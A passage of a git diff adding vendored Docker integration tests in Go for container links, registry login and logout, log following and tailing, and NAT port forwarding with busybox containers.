+ + // Clean for next round + dockerCmd(c, "rm", "-f", "container1") + dockerCmd(c, "rm", "-f", "container2") +} + +func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + idA := strings.TrimSpace(out) + out, _ = dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + idB := strings.TrimSpace(out) + dockerCmd(c, "rename", "container1", "container_new") + dockerCmd(c, "run", "--rm", "--link", "container_new:alias1", "--link", "container2:alias2", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1") + dockerCmd(c, "kill", idA) + dockerCmd(c, "kill", idB) + +} + +func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) { + testRequires(c, DaemonIsLinux) + var ( + expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} + result []string + ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top") + links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + + err := json.Unmarshal([]byte(links), &result) + c.Assert(err, checker.IsNil) + + output := convertSliceOfStringsToMap(result) + + c.Assert(output, checker.DeepEquals, expected) +} + +func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) { + testRequires(c, DaemonIsLinux) + var ( + expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} + result []string + ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") + dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", 
"--link", "container2:alias2", "busybox", "true") + links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + + err := json.Unmarshal([]byte(links), &result) + c.Assert(err, checker.IsNil) + + output := convertSliceOfStringsToMap(result) + + c.Assert(output, checker.DeepEquals, expected) +} + +func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "--name=first", "busybox", "top") + dockerCmd(c, "create", "--name=second", "--link=first:first", "busybox", "top") + dockerCmd(c, "start", "first") + +} + +func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, ExecSupport) + + out, _ := dockerCmd(c, "run", "-itd", "--name", "one", "busybox", "top") + idOne := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-itd", "--name", "two", "--link", "one:onetwo", "busybox", "top") + idTwo := strings.TrimSpace(out) + + c.Assert(waitRun(idTwo), checker.IsNil) + + contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne))) + + contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo))) + // Host is not present in updated hosts file + c.Assert(string(contentTwo), checker.Contains, "onetwo") +} + +func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon, ExecSupport) + dockerCmd(c, "run", "-d", "--name", "one", "busybox", "top") + out, _ := dockerCmd(c, "run", "-d", "--name", "two", "--link", "one:onetwo", "--link", "one:one", "busybox", "top") + id := strings.TrimSpace(string(out)) + + realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") + content, err := readContainerFileWithExec(id, "/etc/hosts") + c.Assert(err, checker.IsNil) + + getIP := 
func(hosts []byte, hostname string) string { + re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname))) + matches := re.FindSubmatch(hosts) + c.Assert(matches, checker.NotNil, check.Commentf("Hostname %s have no matches in hosts", hostname)) + return string(matches[1]) + } + ip := getIP(content, "one") + c.Assert(ip, checker.Equals, realIP) + + ip = getIP(content, "onetwo") + c.Assert(ip, checker.Equals, realIP) + + dockerCmd(c, "restart", "one") + realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") + + content, err = readContainerFileWithExec(id, "/etc/hosts") + c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content))) + ip = getIP(content, "one") + c.Assert(ip, checker.Equals, realIP) + + ip = getIP(content, "onetwo") + c.Assert(ip, checker.Equals, realIP) +} + +func (s *DockerSuite) TestLinksEnvs(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "-e", "e1=", "-e", "e2=v2", "-e", "e3=v3=v3", "--name=first", "busybox", "top") + out, _ := dockerCmd(c, "run", "--name=second", "--link=first:first", "busybox", "env") + c.Assert(out, checker.Contains, "FIRST_ENV_e1=\n") + c.Assert(out, checker.Contains, "FIRST_ENV_e2=v2") + c.Assert(out, checker.Contains, "FIRST_ENV_e3=v3=v3") +} + +func (s *DockerSuite) TestLinkShortDefinition(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "shortlinkdef", "busybox", "top") + + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), checker.IsNil) + + out, _ = dockerCmd(c, "run", "-d", "--name", "link2", "--link", "shortlinkdef", "busybox", "top") + + cid2 := strings.TrimSpace(out) + c.Assert(waitRun(cid2), checker.IsNil) + + links := inspectFieldJSON(c, cid2, "HostConfig.Links") + c.Assert(links, checker.Equals, "[\"/shortlinkdef:/link2/shortlinkdef\"]") +} + +func (s *DockerSuite) TestLinksNetworkHostContainer(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", 
"-d", "--net", "host", "--name", "host_container", "busybox", "top") + out, _, err := dockerCmdWithError("run", "--name", "should_fail", "--link", "host_container:tester", "busybox", "true") + + // Running container linking to a container with --net host should have failed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // Running container linking to a container with --net host should have failed + c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error()) +} + +func (s *DockerSuite) TestLinksEtcHostsRegularFile(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ls", "-la", "/etc/hosts") + // /etc/hosts should be a regular file + c.Assert(out, checker.Matches, "^-.+\n") +} + +func (s *DockerSuite) TestLinksMultipleWithSameName(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name=upstream-a", "busybox", "top") + dockerCmd(c, "run", "-d", "--name=upstream-b", "busybox", "top") + dockerCmd(c, "run", "--link", "upstream-a:upstream", "--link", "upstream-b:upstream", "busybox", "sh", "-c", "ping -c 1 upstream") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go new file mode 100644 index 0000000000..1af927930d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go @@ -0,0 +1,26 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) { + // In a _unix file as using Unix specific files, and must be on the + // same host as the daemon. 
+ testRequires(c, SameHostDaemon, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts") + hosts, err := ioutil.ReadFile("/etc/hosts") + if os.IsNotExist(err) { + c.Skip("/etc/hosts does not exist, skip this test") + } + + c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts)) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go new file mode 100644 index 0000000000..01de75d985 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "bytes" + "os/exec" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) { + cmd := exec.Command(dockerBinary, "login") + + // Send to stdin so the process does not get the TTY + cmd.Stdin = bytes.NewBufferString("buffer test string \n") + + // run the command and block until it's done + err := cmd.Run() + c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available" +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) { + // wrong credentials + out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "401 Unauthorized") + + // now it's fine + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) { + // Test to make sure login still works with the deprecated -e and --email flags + // wrong credentials + out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL) + 
c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "401 Unauthorized") + + // now it's fine + // -e flag + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL) + // --email flag + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go new file mode 100644 index 0000000000..a5f4b108cf --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go @@ -0,0 +1,100 @@ +package main + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") + c.Assert(string(b), checker.Contains, 
privateRegistryURL) + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + + b, err = ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL) + + // check I cannot pull anymore + out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found") +} + +// #23100 +func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + cmd := exec.Command("docker-credential-shell-test", "store") + stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password))) + cmd.Stdin = stdin + c.Assert(cmd.Run(), checker.IsNil) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := fmt.Sprintf(`{ "auths": {"https://%s": {}}, "credsStore": "shell-test" }`, privateRegistryURL) + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Contains, fmt.Sprintf("\"https://%s\": {}", privateRegistryURL)) + c.Assert(string(b), 
checker.Contains, fmt.Sprintf("\"%s\": {}", privateRegistryURL)) + + dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + + b, err = ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"https://%s\": {}", privateRegistryURL)) + c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"%s\": {}", privateRegistryURL)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go new file mode 100644 index 0000000000..eeb008de70 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go @@ -0,0 +1,32 @@ +package main + +import ( + "fmt" + "strings" + "time" + + "github.com/go-check/check" +) + +func (s *DockerSuite) BenchmarkLogsCLIRotateFollow(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--log-opt", "max-size=1b", "--log-opt", "max-file=10", "busybox", "sh", "-c", "while true; do usleep 50000; echo hello; done") + id := strings.TrimSpace(out) + ch := make(chan error, 1) + go func() { + ch <- nil + out, _, _ := dockerCmdWithError("logs", "-f", id) + // if this returns at all, it's an error + ch <- fmt.Errorf(out) + }() + + <-ch + select { + case <-time.After(30 * time.Second): + // ran for 30 seconds with no problem + return + case err := <-ch: + if err != nil { + c.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go new file mode 100644 index 0000000000..d2dcad1052 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go @@ -0,0 +1,328 @@ +package main + +import ( + "fmt" + "io" + "os/exec" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/jsonlog" + "github.com/go-check/check" +) + +// This 
used to work, it test a log of PageSize-1 (gh#4851) +func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) { + testLen := 32767 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +// Regression test: When going over the PageSize, it used to panic (gh#4851) +func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) { + testLen := 32768 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +// Regression test: When going much over the PageSize, it used to block (gh#4851) +func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) { + testLen := 33000 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", id) + + c.Assert(out, checker.HasLen, testLen+1) +} + +func (s *DockerSuite) TestLogsTimestamps(c *check.C) { + testLen := 100 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo = >> a.a; done; cat a.a", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", "-t", id) + + lines := strings.Split(out, "\n") + + c.Assert(lines, checker.HasLen, testLen+1) + + ts := regexp.MustCompile(`^.* `) + + for _, l := range lines { + if l != "" { + _, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l)) + c.Assert(err, checker.IsNil, 
check.Commentf("Failed to parse timestamp from %v", l)) + // ensure we have padded 0's + c.Assert(l[29], checker.Equals, uint8('Z')) + } + } +} + +func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) { + msg := "stderr_log" + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) + + c.Assert(stdout, checker.Equals, "") + + stderr = strings.TrimSpace(stderr) + + c.Assert(stderr, checker.Equals, msg) +} + +func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { + // TODO Windows: Needs investigation why this fails. Obtained string includes + // a bunch of ANSI escape sequences before the "stderr_log" message. + testRequires(c, DaemonIsLinux) + msg := "stderr_log" + out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) + c.Assert(stderr, checker.Equals, "") + + stdout = strings.TrimSpace(stdout) + c.Assert(stdout, checker.Equals, msg) +} + +func (s *DockerSuite) TestLogsTail(c *check.C) { + testLen := 100 + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)) + + id := strings.TrimSpace(out) + dockerCmd(c, "wait", id) + + out, _ = dockerCmd(c, "logs", "--tail", "0", id) + lines := strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 1) + + out, _ = dockerCmd(c, "logs", "--tail", "5", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 6) + + out, _ = dockerCmd(c, "logs", "--tail", "99", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, 100) + + out, _ = dockerCmd(c, "logs", "--tail", "all", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) + + out, _ = dockerCmd(c, "logs", 
"--tail", "-1", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) + + out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id) + lines = strings.Split(out, "\n") + c.Assert(lines, checker.HasLen, testLen+1) +} + +func (s *DockerSuite) TestLogsFollowStopped(c *check.C) { + dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello") + id, err := getIDByName("test") + c.Assert(err, check.IsNil) + + logsCmd := exec.Command(dockerBinary, "logs", "-f", id) + c.Assert(logsCmd.Start(), checker.IsNil) + + errChan := make(chan error) + go func() { + errChan <- logsCmd.Wait() + close(errChan) + }() + + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("Following logs is hanged") + } +} + +func (s *DockerSuite) TestLogsSince(c *check.C) { + name := "testlogssince" + dockerCmd(c, "run", "--name="+name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do sleep 2; echo log$i; done") + out, _ := dockerCmd(c, "logs", "-t", name) + + log2Line := strings.Split(strings.Split(out, "\n")[1], " ") + t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // the timestamp log2 is written + c.Assert(err, checker.IsNil) + since := t.Unix() + 1 // add 1s so log1 & log2 doesn't show up + out, _ = dockerCmd(c, "logs", "-t", fmt.Sprintf("--since=%v", since), name) + + // Skip 2 seconds + unexpected := []string{"log1", "log2"} + for _, v := range unexpected { + c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", since)) + } + + // Test to make sure a bad since format is caught by the client + out, _, _ = dockerCmdWithError("logs", "-t", "--since=2006-01-02T15:04:0Z", name) + c.Assert(out, checker.Contains, "cannot parse \"0Z\" as \"05\"", check.Commentf("bad since format passed to server")) + + // Test with default value specified and parameter omitted + expected := []string{"log1", "log2", "log3"} + for _, cmd := range 
[]*exec.Cmd{ + exec.Command(dockerBinary, "logs", "-t", name), + exec.Command(dockerBinary, "logs", "-t", "--since=0", name), + } { + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out)) + for _, v := range expected { + c.Assert(out, checker.Contains, v) + } + } +} + +func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) { + // TODO Windows TP5 - Figure out why this test is so flakey. Disabled for now. + testRequires(c, DaemonIsLinux) + name := "testlogssincefuturefollow" + out, _ := dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", `for i in $(seq 1 5); do echo log$i; sleep 1; done`) + + // Extract one timestamp from the log file to give us a starting point for + // our `--since` argument. Because the log producer runs in the background, + // we need to check repeatedly for some output to be produced. + var timestamp string + for i := 0; i != 100 && timestamp == ""; i++ { + if out, _ = dockerCmd(c, "logs", "-t", name); out == "" { + time.Sleep(time.Millisecond * 100) // Retry + } else { + timestamp = strings.Split(strings.Split(out, "\n")[0], " ")[0] + } + } + + c.Assert(timestamp, checker.Not(checker.Equals), "") + t, err := time.Parse(time.RFC3339Nano, timestamp) + c.Assert(err, check.IsNil) + + since := t.Unix() + 2 + out, _ = dockerCmd(c, "logs", "-t", "-f", fmt.Sprintf("--since=%v", since), name) + c.Assert(out, checker.Not(checker.HasLen), 0, check.Commentf("cannot read from empty log")) + lines := strings.Split(strings.TrimSpace(out), "\n") + for _, v := range lines { + ts, err := time.Parse(time.RFC3339Nano, strings.Split(v, " ")[0]) + c.Assert(err, checker.IsNil, check.Commentf("cannot parse timestamp output from log: '%v'", v)) + c.Assert(ts.Unix() >= since, checker.Equals, true, check.Commentf("earlier log found. 
since=%v logdate=%v", since, ts)) + } +} + +// Regression test for #8832 +func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { + // TODO Windows: Fix this test for TP5. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`) + + id := strings.TrimSpace(out) + + stopSlowRead := make(chan bool) + + go func() { + exec.Command(dockerBinary, "wait", id).Run() + stopSlowRead <- true + }() + + logCmd := exec.Command(dockerBinary, "logs", "-f", id) + stdout, err := logCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + c.Assert(logCmd.Start(), checker.IsNil) + + // First read slowly + bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) + c.Assert(err, checker.IsNil) + + // After the container has finished we can continue reading fast + bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil) + c.Assert(err, checker.IsNil) + + actual := bytes1 + bytes2 + expected := 200000 + c.Assert(actual, checker.Equals, expected) +} + +func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "logs", "-f", id) + r, w := io.Pipe() + cmd.Stdout = w + c.Assert(cmd.Start(), checker.IsNil) + + // Make sure pipe is written to + chErr := make(chan error) + go func() { + b := make([]byte, 1) + _, err := r.Read(b) + chErr <- err + }() + c.Assert(<-chErr, checker.IsNil) + c.Assert(cmd.Process.Kill(), checker.IsNil) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", 
"/bin/sh", "-c", "while true; do sleep 2; done") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + nroutines, err := getGoroutineNumber() + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "logs", "-f", id) + c.Assert(cmd.Start(), checker.IsNil) + time.Sleep(200 * time.Millisecond) + c.Assert(cmd.Process.Kill(), checker.IsNil) + + // NGoroutines is not updated right away, so we need to wait before failing + c.Assert(waitForGoroutines(nroutines), checker.IsNil) +} + +func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) { + name := "testlogsnocontainer" + out, _, _ := dockerCmdWithError("logs", name) + message := fmt.Sprintf("Error: No such container: %s\n", name) + c.Assert(out, checker.Equals, message) +} + +func (s *DockerSuite) TestLogsWithDetails(c *check.C) { + dockerCmd(c, "run", "--name=test", "--label", "foo=bar", "-e", "baz=qux", "--log-opt", "labels=foo", "--log-opt", "env=baz", "busybox", "echo", "hello") + out, _ := dockerCmd(c, "logs", "--details", "--timestamps", "test") + + logFields := strings.Fields(strings.TrimSpace(out)) + c.Assert(len(logFields), checker.Equals, 3, check.Commentf(out)) + + details := strings.Split(logFields[1], ",") + c.Assert(details, checker.HasLen, 2) + c.Assert(details[0], checker.Equals, "baz=qux") + c.Assert(details[1], checker.Equals, "foo=bar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go new file mode 100644 index 0000000000..7f4cc2cbd7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go @@ -0,0 +1,93 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func startServerContainer(c *check.C, msg string, port int) string { + name := "server" + cmd := []string{ + "-d", + "-p", fmt.Sprintf("%d:%d", port, port), + 
"busybox", + "sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port), + } + c.Assert(waitForContainer(name, cmd...), check.IsNil) + return name +} + +func getExternalAddress(c *check.C) net.IP { + iface, err := net.InterfaceByName("eth0") + if err != nil { + c.Skip(fmt.Sprintf("Test not running with `make test`. Interface eth0 not found: %v", err)) + } + + ifaceAddrs, err := iface.Addrs() + c.Assert(err, check.IsNil) + c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0) + + ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) + c.Assert(err, check.IsNil) + + return ifaceIP +} + +func getContainerLogs(c *check.C, containerID string) string { + out, _ := dockerCmd(c, "logs", containerID) + return strings.Trim(out, "\r\n") +} + +func getContainerStatus(c *check.C, containerID string) string { + out := inspectField(c, containerID, "State.Running") + return out +} + +func (s *DockerSuite) TestNetworkNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + msg := "it works" + startServerContainer(c, msg, 8080) + endpoint := getExternalAddress(c) + conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) + c.Assert(err, check.IsNil) + + data, err := ioutil.ReadAll(conn) + conn.Close() + c.Assert(err, check.IsNil) + + final := strings.TrimRight(string(data), "\n") + c.Assert(final, checker.Equals, msg) +} + +func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + var ( + msg = "hi yall" + ) + startServerContainer(c, msg, 8081) + conn, err := net.Dial("tcp", "localhost:8081") + c.Assert(err, check.IsNil) + + data, err := ioutil.ReadAll(conn) + conn.Close() + c.Assert(err, check.IsNil) + + final := strings.TrimRight(string(data), "\n") + c.Assert(final, checker.Equals, msg) +} + +func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + msg := "it works" + startServerContainer(c, msg, 8080) + endpoint := 
getExternalAddress(c) + out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox", + "sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())) + final := strings.TrimRight(string(out), "\n") + c.Assert(final, checker.Equals, msg) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go new file mode 100644 index 0000000000..4dfad937b5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go @@ -0,0 +1,94 @@ +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/runconfig" + "github.com/go-check/check" +) + +// GH14530. Validates combinations of --net= with other options + +// stringCheckPS is how the output of PS starts in order to validate that +// the command executed in a container did really run PS correctly. +const stringCheckPS = "PID USER" + +// DockerCmdWithFail 